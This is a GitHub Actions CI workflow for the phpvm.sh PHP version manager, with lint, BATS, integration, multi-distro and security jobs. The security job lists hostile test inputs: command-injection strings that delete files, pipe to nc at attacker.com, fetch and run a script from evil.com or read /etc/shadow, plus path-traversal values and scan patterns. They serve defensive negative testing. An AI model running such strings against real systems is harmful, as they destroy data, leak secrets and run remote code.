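name: CI Pipeline

# Runs on pushes to main, development and fix/feature branches, on pull
# requests targeting main or development, on manual dispatch, and weekly.
on:
  push:
    branches: [main, development, 'fix/**', 'feature/**']
  pull_request:
    branches: [main, development]
  workflow_dispatch:
  schedule:
    # Weekly comprehensive tests including security scans (Mondays at 2 AM UTC)
    - cron: '0 2 * * 1'

# Least privilege for GITHUB_TOKEN: the jobs in this workflow check out and
# test the repository and upload artifacts, none of which needs write access.
# Without this block the token gets the repository/organisation default,
# which may be read-write.
permissions:
  contents: read

jobs: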
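# =============================================================================
# QUICK CHECKS - Fast-fail static analysis
# =============================================================================
  quick-checks:
    # Syntax, lint and formatting gates for phpvm.sh and install.sh. Every
    # other job in the workflow lists this one in `needs`.
    name: 'Quick Checks (Syntax, Lint, Format)'
    runs-on: ubuntu-latest
    steps:
      # NOTE(review): @v4 is a mutable tag; pinning the action to a full
      # commit SHA is the supply-chain-safe form.
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          # Nothing here pushes or fetches again, so do not leave the token
          # in .git/config where later steps (including the downloaded shfmt
          # binary) could read it.
          persist-credentials: false

      - name: Shell Syntax Check
        run: |
          echo "=== Checking Shell Syntax ==="
          bash -n phpvm.sh
          if [ -f install.sh ]; then bash -n install.sh; fi
          echo "β Syntax check passed"

      - name: Install Tools
        run: |
          sudo apt-get update
          sudo apt-get install -y shellcheck
          # NOTE(review): this release binary is installed into
          # /usr/local/bin without an integrity check. Record the expected
          # digest in the workflow and verify it before the chmod, e.g.
          #   echo "<PINNED_SHA256>  shfmt" | sha256sum --check -
          wget -O shfmt https://github.com/mvdan/sh/releases/download/v3.12.0/shfmt_v3.12.0_linux_amd64
          chmod +x shfmt
          sudo mv shfmt /usr/local/bin/

      - name: ShellCheck Analysis
        run: |
          echo "=== Running ShellCheck ==="
          shellcheck -f gcc phpvm.sh install.sh || exit 1
          echo "β ShellCheck passed"

      - name: Code Formatting Check
        run: |
          echo "=== Checking Code Formatting ==="
          # -d prints a diff and exits non-zero when a file is not formatted.
          shfmt -d -i 4 -sr phpvm.sh install.sh || {
            echo "β Code formatting issues detected!"
            echo "Run 'make format' locally to fix."
            exit 1
          }
          echo "β Formatting check passed"

      - name: Code Quality Checks
        run: |
          echo "=== Checking Code Quality ==="
          # Check for trailing whitespace
          if grep -n '[[:space:]]$' phpvm.sh install.sh 2>/dev/null; then
            echo "β Trailing whitespace found"
            exit 1
          fi
          # Check for tabs (should use spaces)
          if grep -P '\t' phpvm.sh install.sh 2>/dev/null; then
            echo "β Tabs found - please use spaces"
            exit 1
          fi
          echo "β Code quality checks passed"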
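# =============================================================================
# SECURITY TESTING
# =============================================================================
  security:
    # Static pattern review of phpvm.sh plus negative tests that feed hostile
    # version strings and .phpvmrc contents to the script and expect failure.
    name: 'Security Testing'
    runs-on: ubuntu-latest
    needs: quick-checks
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          # The steps below run the script under test with hostile input;
          # keep the token out of .git/config while they do.
          persist-credentials: false

      # Advisory step: ShellCheck findings are swallowed by `|| true` and the
      # grep hits only print a warning, so nothing here fails the job.
      - name: Security-focused ShellCheck
        run: |
          sudo apt-get update
          sudo apt-get install -y shellcheck
          echo "=== Security-focused Shell Analysis ==="
          shellcheck -f gcc -S error phpvm.sh || true
          # Check for unsafe patterns
          echo "Checking for potential security issues..."
          if grep -n "eval" phpvm.sh; then
            echo "β Found eval usage - review for security"
          fi
          # The patterns are single-quoted so that \$ reaches grep as a
          # literal dollar sign. Inside double quotes the shell reduces \$ to
          # $, which grep reads as an end-of-line anchor, so the check would
          # not look for variables at all. The optional quote also catches
          # the `rm -rf "$var"` form.
          if grep -nE 'rm -rf "?\$' phpvm.sh; then
            echo "β Found variable-based rm -rf - review for safety"
          fi
          if grep -n 'sudo.*\$' phpvm.sh | grep -v "run_with_sudo"; then
            echo "β Found direct sudo with variables - review for safety"
          fi

      - name: Input Validation Security Test
        run: |
          chmod +x ./phpvm.sh
          echo "=== Testing Input Validation Security ==="
          malicious_inputs=(
            "8.1; rm -rf /"
            "8.1 && curl http://evil.com"
            "8.1 | nc attacker.com 1234"
            "\$(whoami)"
            "\`id\`"
            "8.1 > /etc/passwd"
            "8.1; cat /etc/shadow"
            "../../../etc/passwd"
            "8.1 || wget http://evil.com/script.sh -O - | sh"
          )
          # NOTE(review): any non-zero exit counts as "rejected". This job
          # sets up no package manager for phpvm, so `install` may fail for
          # unrelated reasons and the test would still pass - TODO confirm
          # the failure comes from input validation (for example by checking
          # the error message, or that no side effect occurred).
          for input in "${malicious_inputs[@]}"; do
            echo "Testing malicious input: $input"
            if ./phpvm.sh install "$input" 2>/dev/null; then
              echo "β SECURITY ISSUE: Accepted malicious input: $input"
              exit 1
            else
              echo "β Correctly rejected: $input"
            fi
          done

      - name: Path Traversal Security Test
        run: |
          echo "=== Testing Path Traversal Protection ==="
          mkdir -p security_test
          path_traversal_inputs=(
            "../../../etc/passwd"
            "../../root/.ssh/id_rsa"
            "/etc/shadow"
            "..\\..\\windows\\system32\\config\\sam"
            "....//....//etc//passwd"
          )
          # Each value becomes the whole content of .phpvmrc, and `auto` is
          # run from inside that directory; a zero exit is treated as the
          # value having been accepted.
          for input in "${path_traversal_inputs[@]}"; do
            echo "$input" > security_test/.phpvmrc
            cd security_test
            if ../phpvm.sh auto 2>/dev/null; then
              echo "β SECURITY ISSUE: Accepted path traversal: $input"
              exit 1
            else
              echo "β Correctly rejected path traversal: $input"
            fi
            cd ..
          done

      - name: Additional Security Tests
        run: |
          chmod +x ./phpvm.sh
          echo "=== Buffer Overflow & Input Length Tests ==="
          # 1000 'A' characters as the version argument.
          very_long_input=$(printf 'A%.0s' {1..1000})
          if ./phpvm.sh install "$very_long_input" 2>/dev/null; then
            echo "β SECURITY ISSUE: Accepted extremely long input"
            exit 1
          else
            echo "β Correctly rejected extremely long input"
          fi
          echo "=== File Permission Security ==="
          mkdir -p perm_test
          echo "8.1" > perm_test/.phpvmrc
          chmod 777 perm_test/.phpvmrc
          cd perm_test
          # NOTE(review): this check cannot fail. If `auto` succeeds nothing
          # is asserted, and if it fails the `|| echo` turns that into
          # success. Decide whether a world-writable .phpvmrc must be refused
          # and assert that outcome explicitly.
          ../phpvm.sh auto || echo "β Handled world-writable .phpvmrc"
          cd ..
          echo "=== Checking for Hardcoded Secrets ==="
          # Advisory keyword scan; a hit prints a warning but does not fail.
          if grep -iE "(password|secret|api.*key|auth.*token)" phpvm.sh | grep -v "^#"; then
            echo "β Found potential secret patterns - review"
          fi
          echo "β Security tests completed"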
# =============================================================================
# BATS TEST SUITE
# =============================================================================
  bats-tests:
    # Runs the BATS suite under tests/ on every OS in the matrix once the
    # quick static checks have passed.
    name: "BATS Tests (${{ matrix.os }})"
    needs: quick-checks
    runs-on: ${{ matrix.os }}
    strategy:
      # One OS failing does not cancel the other.
      fail-fast: false
      matrix:
        os:
          - ubuntu-latest
          - macos-latest
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      # Homebrew provides bats-core on macOS; every other runner uses apt.
      - name: Install BATS
        run: |
          case "${{ runner.os }}" in
            macOS)
              brew install bats-core
              ;;
            *)
              sudo apt-get update
              sudo apt-get install -y bats
              ;;
          esac

      - name: Run BATS Test Suite
        run: |
          echo "=== Running BATS Test Suite ==="
          bats tests/ -t

      # always() keeps the upload step running when the suite has failed.
      - name: Upload Test Results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: bats-results-${{ matrix.os }}
          path: test-results/
          retention-days: 30
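# =============================================================================
# CORE FUNCTIONALITY TESTS
# =============================================================================
  core-tests:
    # Smoke tests for the phpvm.sh command-line interface on Linux and macOS:
    # version/help/list/info, error handling, .phpvmrc auto-switch, timing.
    name: 'Core Functionality (${{ matrix.os }})'
    runs-on: ${{ matrix.os }}
    needs: quick-checks
    strategy:
      fail-fast: false
      matrix:
        os: [ubuntu-latest, macos-latest]
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          # A remotely fetched installer runs in the next step; do not leave
          # the token in .git/config for it to read.
          persist-credentials: false

      # NOTE(review): the installer is taken from the moving HEAD ref and
      # executed directly, so its content can change between runs without
      # review. Fetching it at a reviewed commit (<PINNED_COMMIT_SHA> in
      # place of HEAD) would make the run reproducible and narrow the
      # supply-chain exposure.
      - name: Setup Homebrew (Linux)
        if: runner.os == 'Linux'
        run: |
          sudo apt-get update
          sudo apt-get install -y build-essential curl file git
          NONINTERACTIVE=1 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
          echo 'eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"' >> ~/.bashrc
          eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
          brew --version

      - name: Make Script Executable
        run: chmod +x ./phpvm.sh

      - name: Test Version Commands
        run: |
          echo "=== Testing Version Commands ==="
          ./phpvm.sh version
          ./phpvm.sh --version
          ./phpvm.sh -v
          echo "β All version commands work"

      - name: Test Basic Commands
        run: |
          echo "=== Testing Basic Commands ==="
          ./phpvm.sh help
          # `list` is best-effort here: a non-zero exit is tolerated.
          ./phpvm.sh list || echo "List executed"
          ./phpvm.sh info
          echo "β Basic commands work"

      - name: Test Error Handling
        run: |
          echo "=== Testing Error Handling ==="
          # Invalid command
          if ./phpvm.sh invalid_command 2>/dev/null; then
            echo "β Should have failed on invalid command"
            exit 1
          else
            echo "β Correctly handles invalid commands"
          fi
          # Missing version parameter
          if ./phpvm.sh use 2>/dev/null; then
            echo "β Should have failed on missing version"
            exit 1
          else
            echo "β Correctly handles missing version parameter"
          fi

      - name: Test .phpvmrc Auto-Switch
        run: |
          echo "=== Testing .phpvmrc Auto-Switch ==="
          mkdir -p test_project
          echo "8.3" > test_project/.phpvmrc
          cd test_project
          # Each step starts a fresh shell, so the Homebrew environment set
          # up earlier has to be loaded again on Linux.
          if [[ "${{ runner.os }}" == "Linux" ]]; then
            eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)" 2>/dev/null || true
          fi
          # Best-effort: a failing auto-switch only prints a message.
          ../phpvm.sh auto || echo "Auto-switch attempted"
          cd ..
          echo "β Auto-switch test completed"

      - name: Performance Check
        run: |
          echo "=== Performance Check ==="
          time ./phpvm.sh version >/dev/null
          time ./phpvm.sh help >/dev/null
          time ./phpvm.sh list >/dev/null
          echo "β Performance check completed"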
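# =============================================================================
# PHP INSTALLATION & INTEGRATION TESTS
# =============================================================================
  php-integration:
    # End-to-end run of install/use/list/system, the .phpvmrc workflow and
    # recovery from damaged state, after the BATS and core jobs have finished.
    name: 'PHP Integration (${{ matrix.os }})'
    runs-on: ${{ matrix.os }}
    needs: [bats-tests, core-tests]
    strategy:
      fail-fast: false
      matrix:
        os: [ubuntu-latest, macos-latest]
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          # A remotely fetched installer and freshly installed packages run
          # in later steps; do not leave the token in .git/config.
          persist-credentials: false

      # NOTE(review): the installer is taken from the moving HEAD ref and
      # executed directly, so its content can change between runs without
      # review. Fetching it at a reviewed commit (<PINNED_COMMIT_SHA> in
      # place of HEAD) would narrow the supply-chain exposure.
      - name: Setup Homebrew (Linux)
        if: runner.os == 'Linux'
        run: |
          sudo apt-get update
          sudo apt-get install -y build-essential curl file git
          NONINTERACTIVE=1 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
          echo 'eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"' >> ~/.bashrc
          eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"

      - name: Test Installation Script
        run: |
          echo "=== Testing install.sh ==="
          bash -n install.sh
          # Verify install script components
          # NOTE(review): in a `grep && echo` list a failing grep is ignored
          # by `set -e`, except on the final line, whose status becomes the
          # step's exit status. Only the chmod check can fail the step.
          grep -q "uname" install.sh && echo "β OS detection present"
          grep -qE "curl|wget" install.sh && echo "β Download mechanism present"
          grep -q "chmod" install.sh && echo "β Permission setting present"

      - name: Test PHP Installation Flow
        run: |
          chmod +x phpvm.sh
          if [[ "${{ runner.os }}" == "Linux" ]]; then
            eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
          fi
          echo "=== Testing PHP Installation ==="
          # install/use/system are best-effort; only `list` must succeed.
          ./phpvm.sh install 8.3 || echo "PHP 8.3 installation attempted"
          ./phpvm.sh use 8.3 || echo "Switch to 8.3 attempted"
          ./phpvm.sh list
          ./phpvm.sh system || echo "System switch attempted"

      - name: Test Project Workflow
        run: |
          if [[ "${{ runner.os }}" == "Linux" ]]; then
            eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)"
          fi
          echo "=== Testing Project Workflow ==="
          mkdir -p test_project
          echo "8.3" > test_project/.phpvmrc
          cd test_project
          ../phpvm.sh auto || echo "Auto-switch attempted"
          cd ..

      # Every command below is followed by `|| echo`, so this step records
      # how the script behaves on damaged state but never fails because of it.
      - name: Test Error Recovery
        run: |
          echo "=== Testing Error Recovery ==="
          # Corrupted state
          mkdir -p ~/.phpvm
          echo "corrupted_data" > ~/.phpvm/active_version
          ./phpvm.sh list || echo "β Handled corrupted state"
          # Missing directories
          rm -rf ~/.phpvm/versions 2>/dev/null || true
          ./phpvm.sh list || echo "β Handled missing directories"
          # Invalid .phpvmrc
          mkdir -p error_test
          printf '\x00\x01\x02' > error_test/.phpvmrc
          cd error_test
          ../phpvm.sh auto 2>/dev/null || echo "β Handled binary .phpvmrc"
          cd ..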
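# =============================================================================
# EXTENDED TESTS - Multi-Distribution (Scheduled only)
# =============================================================================
  multi-distro:
    # Syntax check and version/help smoke test of phpvm.sh inside several
    # distribution images. Runs on the schedule, on manual dispatch and on
    # pushes to main only.
    name: 'Multi-Distribution (${{ matrix.scenario }})'
    runs-on: ubuntu-latest
    needs: quick-checks
    if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch' || (github.event_name == 'push' && github.ref == 'refs/heads/main')
    strategy:
      fail-fast: false
      matrix:
        # NOTE(review): the images are referenced by mutable tag; pinning
        # each one by digest would fix exactly what the tests run in.
        include:
          - distro: ubuntu:22.04
            scenario: 'Ubuntu 22.04 LTS'
          - distro: ubuntu:24.04
            scenario: 'Ubuntu 24.04 LTS'
          - distro: debian:12
            scenario: 'Debian 12'
          - distro: fedora:39
            scenario: 'Fedora 39'
          - distro: alpine:3.19
            scenario: 'Alpine 3.19'
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          # The checkout, including .git, is mounted read-write into a
          # third-party image below; keep the token out of .git/config.
          persist-credentials: false

      - name: Run Tests in Container
        run: |
          # Alpine images ship without bash, so the outer shell is sh there;
          # the inner script installs bash before using it.
          if [[ "${{ matrix.distro }}" == alpine* ]]; then
            SHELL_CMD="sh"
          else
            SHELL_CMD="bash"
          fi
          # Expansions are quoted so a workspace path containing spaces or
          # glob characters cannot split the docker arguments.
          docker run --rm -v "$PWD:/workspace" -w /workspace "${{ matrix.distro }}" "$SHELL_CMD" -c "
            echo '=== Testing on ${{ matrix.scenario }} ==='
            # Install basic tools
            if command -v apt-get >/dev/null 2>&1; then
              apt-get update && apt-get install -y bash curl
            elif command -v dnf >/dev/null 2>&1; then
              dnf install -y bash curl
            elif command -v apk >/dev/null 2>&1; then
              apk add --no-cache bash curl
            fi
            # Test syntax
            bash -n phpvm.sh || exit 1
            # Test basic commands
            chmod +x phpvm.sh
            ./phpvm.sh version || exit 1
            ./phpvm.sh help >/dev/null || exit 1
            echo 'β All tests passed for ${{ matrix.scenario }}'
          "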
# =============================================================================
# PERFORMANCE TESTING (Scheduled only)
# =============================================================================
  performance:
    # Times repeated and concurrent `phpvm.sh version` calls. Limited to the
    # schedule, manual dispatch and pushes to main.
    name: 'Performance & Load Testing'
    needs: quick-checks
    runs-on: ubuntu-latest
    if: >-
      github.event_name == 'schedule' ||
      github.event_name == 'workflow_dispatch' ||
      (github.event_name == 'push' && github.ref == 'refs/heads/main')
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Performance Benchmarks
        run: |
          chmod +x ./phpvm.sh
          echo "=== Performance Testing ==="
          # Startup time
          echo "Measuring startup time (10 iterations):"
          for ((run = 1; run <= 10; run++)); do
            time ./phpvm.sh version >/dev/null
          done
          # Concurrent operations
          echo "Testing 20 concurrent operations:"
          for ((job = 1; job <= 20; job++)); do
            ./phpvm.sh version >/dev/null &
          done
          # Block until every background invocation has exited.
          wait
          echo "β Performance tests completed"
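# =============================================================================
# QUALITY GATE - Final validation
# =============================================================================
  quality-gate:
    # Single pass/fail verdict over the required jobs. The scheduled-only
    # multi-distro and performance jobs are not part of the gate.
    name: 'Quality Gate β'
    runs-on: ubuntu-latest
    needs: [quick-checks, security, bats-tests, core-tests, php-integration]
    # always() makes the gate run even when a required job failed; without
    # it the gate would be skipped instead of reporting the failure.
    if: always()
    steps:
      - name: Check All Required Jobs
        run: |
          echo "=== Quality Gate Validation ==="
          # Anything other than "success" fails the gate, which includes
          # jobs that were skipped or cancelled.
          if [ "${{ needs.quick-checks.result }}" != "success" ]; then
            echo "β Quick checks failed"
            exit 1
          fi
          if [ "${{ needs.security.result }}" != "success" ]; then
            echo "β Security tests failed"
            exit 1
          fi
          if [ "${{ needs.bats-tests.result }}" != "success" ]; then
            echo "β BATS tests failed"
            exit 1
          fi
          if [ "${{ needs.core-tests.result }}" != "success" ]; then
            echo "β Core tests failed"
            exit 1
          fi
          if [ "${{ needs.php-integration.result }}" != "success" ]; then
            echo "β PHP integration tests failed"
            exit 1
          fi
          echo "β All quality checks passed!"
          echo "β CI pipeline successful!"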